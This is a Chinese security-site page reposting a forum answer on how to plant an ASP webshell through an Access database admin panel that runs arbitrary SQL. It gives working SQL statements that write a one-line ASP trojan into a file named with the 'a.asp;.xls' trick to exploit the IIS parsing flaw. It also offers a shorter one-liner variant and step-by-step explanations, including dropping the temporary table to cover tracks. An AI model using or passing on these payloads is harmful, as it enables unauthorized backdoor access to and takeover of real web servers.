• linkedu视频
  • 平面设计
  • 电脑入门
  • 操作系统
  • 办公应用
  • 电脑硬件
  • 动画设计
  • 3D设计
  • 网页设计
  • CAD设计
  • 影音处理
  • 数据库
  • 程序设计
  • 认证考试
  • 信息管理
  • 信息安全
菜单
linkedu.com
  • 网页制作
  • 数据库
  • 程序设计
  • 操作系统
  • CMS教程
  • 游戏攻略
  • 脚本语言
  • 平面设计
  • 软件教程
  • 网络安全
  • 电脑知识
  • 服务器
  • 视频教程
  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链
您的位置:首页 > 网络安全 >入侵防御 > ACCESS数据库后台sql语句执行导shell的方法

ACCESS数据库后台sql语句执行导shell的方法

作者:佚名 字体:[增加 减小] 来源:互联网

佚名 向大家分享了ACCESS数据库后台sql语句执行导shell的方法,其中包含access数据库和sql,access数据库转sql,access数据库导入sql,access数据库sql语句,access数据库转换sql等知识点,遇到此问题的同学们可以参考下
需要什么条件,语句又是什么?网上翻不到资料。麻烦各位。

答:

create table cmd (a varchar(50))
insert into cmd (a) values ('<%execute request("a")%>')
select * into [a] in 'f:\host\qhdyxt\web\a.asp;.xls' 'excel 4.0;' from cmd
drop table cmd

解释如下:
1.create table a (a varchar(50)) 建立一个有一个A字段的表 表名为a 字段类型为字符 长度为50
2.insert into a (a) values ('<%execute request("a")%>') 在表a的a字段插入密码为a的一句话木马
3.select * into [a] in 'F:\jt\work\a.asp;.xls' 'excel 4.0;' from a 把表a的内容导出为物理路径的一个
EXCEL文件,为什么用excel文件,因为ACCESS数据库不允许导出其他危险格式。我们导出为EXCEL后在利用IIS解析漏洞就可以变成我们的小马了。很*的说~~
4.drop table a 丢家伙闪人 射完就走!

小弟的提问,没两分钟大家就回答了,强烈顶t00ls牛淫。

这个更简单:

Access利用后台SQL执行命令功能导出WebShell:
SELECT '<%execute request("a")%>' into [vote] in 'd:\web\x.asp;.xls' 'excel 8.0;' from vote
后台提供SQL执行功能且知道绝对路径方可使用(vote为已知表段) </div>

您可能想查找下面的文章:

  • ACCESS数据库后台sql语句执行导shell的方法

相关文章

  • 手动mysql 高级注入实例分析
  • IDS入侵特征库样本数据建立详解
  • 入侵与反入侵案例
  • php+mysql5半自动注入工具图文教程
  • 安全中国提取权限过程 图文
  • 黑客在线之经典入侵技术总结 (一)
  • 安全狗下加用户的又一方法
  • 黑客入侵oracle数据库的一些心得
  • Cross Iframe Trick:the Old New Thing(图)
  • 详尽了解黑客入侵 WindowsXP系统的方法

文章分类

  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链

最近更新的内容

    • 通过自解压包来实现入侵
    • 利用SA权限入侵Mssql主机后的感悟
    • 全方位了解黑客如何入侵NT系统
    • 黑客在网吧内是如何入侵其他电脑的
    • webshell下分离大文件资料
    • 黑客在线之经典入侵技术总结 (一)
    • 手工注入拿到管理员密码登陆后台 图文
    • 黑客在线之经典入侵技术总结 (二)
    • Serv-U FTP Jail Break(越权遍历目录、下载任意文件)
    • 记一次入侵BT服务器

关于我们 - 联系我们 - 免责声明 - 网站地图

©2020-2025 All Rights Reserved. linkedu.com 版权所有